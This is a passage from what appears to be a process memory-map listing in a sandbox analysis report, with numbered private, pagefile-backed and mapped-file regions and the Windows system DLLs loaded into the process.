"private_0x00000000036f0000" filename = "" Region: id = 530 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 531 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 532 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 533 start_va = 0x35e0000 end_va = 0x35e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 534 start_va = 0x35e0000 end_va = 0x35e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 535 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 536 start_va = 0x36f0000 end_va = 0x37f0fff entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 537 start_va = 0x743a0000 end_va = 0x743b1fff entry_point = 0x743a0000 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 538 start_va = 0x74240000 end_va = 0x7439ffff entry_point = 0x74240000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 539 start_va = 0x3800000 end_va = 0x3800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003800000" filename = "" Region: id = 540 start_va = 0x74220000 end_va = 0x74239fff entry_point = 0x74220000 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 541 start_va = 0x74210000 end_va = 0x7421afff entry_point = 0x74210000 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 542 start_va = 0x74200000 end_va = 0x74207fff entry_point = 0x74200000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 543 start_va = 0x741b0000 end_va = 0x741f5fff entry_point = 0x741b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 544 start_va = 0x3810000 end_va = 0x3811fff entry_point = 0x0 region_type = private name = "private_0x0000000003810000" filename = "" Region: id = 545 start_va = 0x3820000 end_va = 0x3823fff entry_point = 0x0 region_type = private name = "private_0x0000000003820000" filename = "" Region: id = 546 start_va = 0x3810000 end_va = 0x3811fff entry_point = 0x0 region_type = private name = "private_0x0000000003810000" filename = "" Region: id = 547 start_va = 0x741a0000 end_va = 0x741affff entry_point = 0x741a0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 548 start_va = 0x3830000 end_va = 0x3831fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003830000" filename = "" Region: id = 549 start_va = 0x73f90000 end_va = 0x74198fff entry_point = 0x73f90000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849\\comctl32.dll") Region: id = 550 start_va = 0x3840000 end_va = 0x3842fff entry_point = 0x3840000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui") Region: id = 551 start_va = 0x3850000 end_va = 0x3851fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003850000" filename = "" Region: id = 552 start_va = 0x73f80000 end_va = 0x73f8efff entry_point = 0x73f80000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 553 start_va = 0x73f70000 end_va = 0x73f79fff entry_point = 0x73f70000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 554 start_va = 0x3860000 end_va = 0x386ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003860000" filename = "" Region: id = 555 start_va = 0x3870000 end_va = 0x3870fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 556 start_va = 0x3880000 end_va = 0x3882fff entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 557 start_va = 0x73f60000 end_va = 0x73f6efff entry_point = 0x73f60000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 558 start_va = 0x3870000 end_va = 0x3870fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 559 start_va = 0x3880000 end_va = 0x3882fff entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 560 start_va = 0x3870000 end_va = 0x3870fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 561 start_va = 0x3880000 end_va = 0x3882fff entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 562 start_va = 0x3870000 end_va = 0x3870fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 563 start_va = 0x3880000 end_va = 0x3882fff entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 566 start_va = 0x3870000 end_va = 0x3870fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 567 start_va = 0x3880000 end_va = 0x3882fff entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 568 start_va = 0x3870000 end_va = 0x3870fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 569 start_va = 0x3880000 end_va = 0x3882fff entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 570 start_va = 0x3870000 end_va = 0x3870fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 571 start_va = 0x3880000 end_va = 0x3882fff entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 574 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 575 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 576 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 577 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 578 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 579 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 580 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 581 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 582 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 583 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 584 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 585 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 586 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 587 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 588 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 589 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 590 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 591 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 592 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 593 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 594 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 595 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 596 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 597 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 598 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 599 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 600 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 601 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 602 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 603 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 604 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 605 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 606 start_va = 0x35e0000 end_va = 0x35e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 607 start_va = 0x35e0000 end_va = 0x35e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 608 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 609 start_va = 0x36f0000 end_va = 0x37f0fff entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 610 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 611 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 612 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 613 start_va = 0x35e0000 end_va = 0x35e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 614 start_va = 0x35e0000 end_va = 0x35e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 615 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 616 start_va = 0x36f0000 end_va = 0x37f0fff entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 617 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 618 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 619 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 620 start_va = 0x35e0000 end_va = 0x35e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 621 start_va = 0x35e0000 end_va = 0x35e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 622 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 623 start_va = 0x36f0000 end_va = 0x37f0fff entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 624 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 625 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 626 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 627 start_va = 0x35e0000 end_va = 0x35e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 628 start_va = 0x35e0000 end_va = 0x35e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 629 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 630 start_va = 0x36f0000 end_va = 0x37f0fff entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 631 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 632 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 633 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 634 start_va = 0x35e0000 end_va = 0x35e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 635 start_va = 0x35e0000 end_va = 0x35e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 636 start_va = 0x35e0000 end_va = 0x36e0fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 637 start_va = 0x36f0000 end_va = 0x37f0fff entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 638 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 639 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 640 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 641 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 642 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 643 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 644 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 645 start_va = 0x35e0000 end_va = 0x35e2fff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 646 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 647 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 648 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 649 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 650 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 651 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 652 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 653 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 654 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 655 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 656 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 657 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 658 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 659 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 660 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 661 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 662 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 663 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 664 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 665 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 666 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 667 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 668 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 669 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 670 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 671 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 672 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 673 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 674 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 675 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 676 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 677 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 678 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 679 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 680 start_va = 0x3600000 end_va = 0x3600fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 681 start_va = 0x3600000 end_va = 0x3600fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 682 start_va = 0x3600000 end_va = 0x3700fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 683 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 684 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 685 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 686 start_va = 0x3600000 end_va = 0x3600fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 687 start_va = 0x3600000 end_va = 0x3600fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 688 start_va = 0x3600000 end_va = 0x3700fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 689 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 690 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 691 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 692 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 693 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 694 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 695 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 696 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 697 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 698 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 699 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 700 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 701 start_va = 0x3600000 end_va = 0x3600fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 702 start_va = 0x3600000 end_va = 0x3600fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 703 start_va = 0x3600000 end_va = 0x3700fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 704 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 705 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 706 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 707 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 708 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 709 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 710 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 711 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 712 start_va = 0x3600000 end_va = 0x3600fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 713 start_va = 0x3600000 end_va = 0x3600fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 714 start_va = 0x3600000 end_va = 0x3700fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 715 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 716 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 717 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 718 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 719 start_va = 0x3600000 end_va = 0x3600fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 720 start_va = 0x3600000 end_va = 0x3600fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 721 start_va = 0x3600000 end_va = 0x3700fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 722 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 723 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 724 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 725 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 726 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 727 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 728 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 729 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 730 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 731 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 732 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 733 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 734 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 735 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 736 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 737 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 738 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 739 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 740 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 741 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 742 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 743 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 744 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 745 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 746 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 747 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 748 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 749 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 750 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 751 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 752 start_va = 